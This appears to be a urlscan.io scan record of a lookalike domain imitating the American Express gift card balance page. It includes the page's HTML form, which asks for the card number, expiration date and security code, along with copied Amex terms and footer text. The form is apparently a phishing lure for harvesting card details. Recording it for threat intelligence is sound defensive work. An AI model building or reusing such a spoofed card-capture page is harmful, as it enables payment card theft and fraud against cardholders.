amexgiftecrd.autos Open in urlscan Pro
188.114.97.3  Public Scan

Submitted URL: http://amexgiftecrd.autos/
Effective URL: https://amexgiftecrd.autos/
Submission: On August 11 via api from FR — Scanned from NL

Form analysis 1 forms found in the DOM

Name: brandLoginForm

<form _ngcontent-tcy-c41="" novalidate="" id="brandLoginForm" name="brandLoginForm" autocomplete="off" class="collapse-margin-xs-bottom collapse-padding well ng-untouched ng-pristine ng-invalid ng-star-inserted" @submit.prevent="handleSubmit">
  <h1 _ngcontent-tcy-c41="" class="fontAL font16px23pxlh font-light vertical-padding-bottom-2 horizontal-padding-2" style="margin-top: 40px"> Manage your Card </h1>
  <h2 _ngcontent-tcy-c41="" class="fontPN horizontal-padding-4">
    <p _ngcontent-tcy-c41="" class="font15px26pxlh">Enter your Card details to check your balance</p>
  </h2>
  <div _ngcontent-tcy-c41="" class="horizontal-padding-4">
    <div _ngcontent-tcy-c41="" class="row">
      <div _ngcontent-tcy-c41="" class="col-xs-12 col-sm-12 col-md-12 collapse-padding-right">
        <div _ngcontent-tcy-c41="" class="form-group">
          <label _ngcontent-tcy-c41="" for="cardnumber" class="font13px18pxlh font-bold fontHN font-color-brandcolor50"> CARD NUMBER (15 digits, no spaces) </label>
          <input _ngcontent-tcy-c41="" formcontrolname="cardnumber" name="cardNumber" inputonlynumbers="true" id="cardNumber" minlength="15" maxlength="16" required="" aria-describedby="loginPageErrors"
            class="form-control fontPN font13px ng-untouched ng-pristine ng-invalid" placeholder="15 digits, no spaces" type="password" aria-invalid="false" wire:model="cardNumber">
        </div>
      </div>
    </div>
    <div _ngcontent-tcy-c41="" class="row">
      <div _ngcontent-tcy-c41="" class="col-xs-12 col-sm-12 col-md-12 collapse-padding-right">
        <label _ngcontent-tcy-c41="" for="cardnumber" class="font13px18pxlh font-bold fontHN font-color-brandcolor50"> EXPIRATION DATE (MM / YY) </label>
        <div _ngcontent-tcy-c41="" class="row">
          <div _ngcontent-tcy-c41="" class="col-xs-6 col-sm-6 col-md-6 expMM">
            <div _ngcontent-tcy-c41="" class="form-group">
              <input _ngcontent-tcy-c41="" formcontrolname="expirationMonth" name="expirationMonth" inputonlynumbers="true" id="expirationMonth" minlength="2" maxlength="2" mandatory="true" data-code="110" aria-describedby="loginPageErrors"
                class="form-control fontPN font13px ng-untouched ng-pristine ng-invalid" placeholder="MM" type="password" aria-invalid="false" wire:model="expirationMonth">
            </div>
          </div>
          <div _ngcontent-tcy-c41="" class="col-xs-6 col-sm-6 col-md-6 expYY">
            <div _ngcontent-tcy-c41="" class="form-group">
              <input _ngcontent-tcy-c41="" formcontrolname="expirationYear" name="expirationYear" inputonlynumbers="true" id="expirationYear" minlength="2" maxlength="2" mandatory="true" data-code="110" aria-describedby="loginPageErrors"
                class="form-control fontPN font13px ng-untouched ng-pristine ng-invalid" placeholder="YY" type="password" aria-invalid="false" wire:model="expirationYear">
            </div>
          </div>
        </div>
      </div>
    </div>
    <div _ngcontent-tcy-c41="" style="margin-bottom: 15px;" class="row">
      <div _ngcontent-tcy-c41="" class="col-xs-12 col-sm-12 col-md-12 collapse-padding-right">
        <div _ngcontent-tcy-c41="" class="form-group">
          <label _ngcontent-tcy-c41="" id="cvvLabel" for="cvv" class="font13px18pxlh font-bold fontHN font-color-brandcolor50"> SECURITY CODE (Enter 4-digit code) </label>
          <input _ngcontent-tcy-c41="" tabindex="0" formcontrolname="cvv" name="cvv" size="4" maxlength="4" minlength="4" inputonlynumbers="true" id="cvv" mandatory="true" data-code="115" aria-describedby="loginPageErrors"
            class="margin form-control fontPN font13px ng-untouched ng-pristine ng-invalid" placeholder="Enter 4-digit code" type="password" aria-invalid="false" wire:model="cvv">
          <button _ngcontent-tcy-c41="" id="cvvTooltipButton" type="button" class="tooltipIcon" aria-label="Information on where to locate the security code.">
            <img _ngcontent-tcy-c41="" aria-controls="cvvTooltipContent" aria-describedby="cvvTooltipContent" aria-labelledby="cvvLabel" class="toolTipIconImg" alt="Tool tip icon image to locate security code on card" src="icon_help.png"
              aria-expanded="false" name="tooltip cardback US">
          </button>
        </div>
      </div>
    </div>
    <div _ngcontent-tcy-c41="" class="row ng-star-inserted">
      <div _ngcontent-tcy-c41="" class="col-xs-12 col-sm-12 col-md-12 collapse-padding-right">
        <div _ngcontent-tcy-c41="" class="form-group emailAddressFormGroup">
          <label _ngcontent-tcy-c41="" for="emailAddress" id="emailLabel" class="font13px18pxlh font-bold fontHN font-color-brandcolor50"> EMAIL ADDRESS </label>
          <input _ngcontent-tcy-c41="" tabindex="0" formcontrolname="emailAddress" type="text" name="emailAddress" id="emailAddress" mandatory="false" data-code="115" aria-describedby="loginPageErrors"
            class="margin form-control fontPN font13px ng-untouched ng-pristine ng-valid" placeholder="Optional" aria-invalid="false" wire:model="emailAddress">
          <div _ngcontent-tcy-c41="" class="tooltipIcon emailToolTip">
            <button _ngcontent-tcy-c41="" id="emailTooltip" tabindex="0" type="button" aria-controls="emailTooltipContent" aria-describedby="emailTooltipContent" aria-labelledby="emailLabel" aria-expanded="false"
              aria-label="Information on email agreement.">
              <img _ngcontent-tcy-c41="" class="toolTipIconImg" alt="Tool tip icon image to show Notification of agreement to receive emails from American Express and our Privacy Agreement link" src="icon_help.png">
            </button>
          </div>
        </div>
      </div>
    </div>
    <div _ngcontent-tcy-c41="" class="row eye-icon-row">
      <div _ngcontent-tcy-c41="" class="col-xs-12 vertical-padding-bottom-2">
        <button _ngcontent-tcy-c41="" type="button" class="eye-icon eye-icon-disabled" disabled="">
          <span _ngcontent-tcy-c41="" class="txtBtn ng-star-inserted">
            <i _ngcontent-tcy-c41="" class="fa fa-eye"></i>Show Card Info </span>
        </button>
      </div>
    </div>
    <div _ngcontent-tcy-c41="" class="col-xs-12 col-sm-12 col-md-12 vertical-spacing-bottom-4 vertical-spacing-top-2 collapse-padding">
      <button _ngcontent-tcy-c41="" type="submit" id="brandLoginForm_button" class="btn btn-primary blue btn-block btn-md fontBS font18px18pxlh font-light"> Continue <span wire:loading="submitForm" class="custom-spinner" role="status"
          aria-hidden="true"></span>
        <style>
          .custom-spinner {
            display: inline-block;
            width: 1.5rem;
            height: 1.5rem;
            border: 0.15em solid currentColor;
            border-right-color: transparent;
            border-radius: 50%;
            animation: spinner-border 0.75s linear infinite;
          }

          @keyframes spinner-border {
            to {
              transform: rotate(360deg);
            }
          }
        </style>
      </button>
    </div>
  </div>
</form>

Text Content

 * Using your Card
 * Help
 * Check Balance
 * Home
 * Purchase Gift Cards

The safety and security of your Gift Card is important to us.
To avoid your Card being declined when shopping online, please use at online
merchants that require the Card number, expiration and security code.

The safety and security of your Gift Card is important to us.
To avoid your Card being declined when shopping online, please use at online
merchants that require the Card number, expiration and security code.
Purchase Gift Cards
 * Using your Card
 * Help
 * Check Balance

GIFT CARDS AND BUSINESS GIFT CARDS


MANAGE YOUR CARD

ENTER YOUR CARD DETAILS TO CHECK YOUR BALANCE

CARD NUMBER (15 digits, no spaces)
EXPIRATION DATE (MM / YY)

SECURITY CODE (Enter 4-digit code)
EMAIL ADDRESS

Show Card Info
Continue


MANAGE AND ACTIVATE YOUR CARD


 * NO FEES AFTER PURCHASE


 * CARD IS REPLACEABLE IF LOST OR STOLEN*


 * FUNDS DO NOT EXPIRE


 * USE ONLINE AND IN-STORE

 * *RESTRICTIONS APPLY. SEE APPLICABLE CARDHOLDER AGREEMENTS BELOW.

Store Locations


TERMS AND CONDITIONS

Click here for information about addressing complaints regarding our money
services business, lists of our money services business licenses and other
disclosures.

American Express® Gift Cards and Business Gift Cards and American Express® eGift
Cards and Business eGift Cards may be used virtually anywhere in the U.S. that
accept American Express Cards, except to the extent limitations on participating
locations are indicated on the back of the Card. These products may not be used
at ATMs or for Recurring Billing. Additional Limitations may apply. See
Cardholder Agreements for complete details.

For questions about American Express Gift Cards or Business Gift Cards, you may
call 1-888-846-4308 , seven days per week. American Express Gift Cards, PO Box
826, Fortson, GA 31808.

Cards are issued by American Express Prepaid Card Management Corporation. PCMC
is licensed as a Money Transmitter by the New York State Department of Financial
Services. NMLS ID# 913823.

ABOUT
 * ABOUT AMERICAN EXPRESS
 * Help
 * CONTACT US

LINKS YOU MAY LIKE
 * Serve®
 * Bluebird®

ADDITIONAL INFORMATION
 * Cardholder Agreements
 * Accessibility Statement

 * Terms of Service
 * Privacy Center
 * Ad Choices
 * Security Center
 * Cardholder Agreements

All users of our online service subject to Privacy Statement and agree to be
bound by Terms of Service. Please review.



© 2020 American Express Company. All Rights Reserved.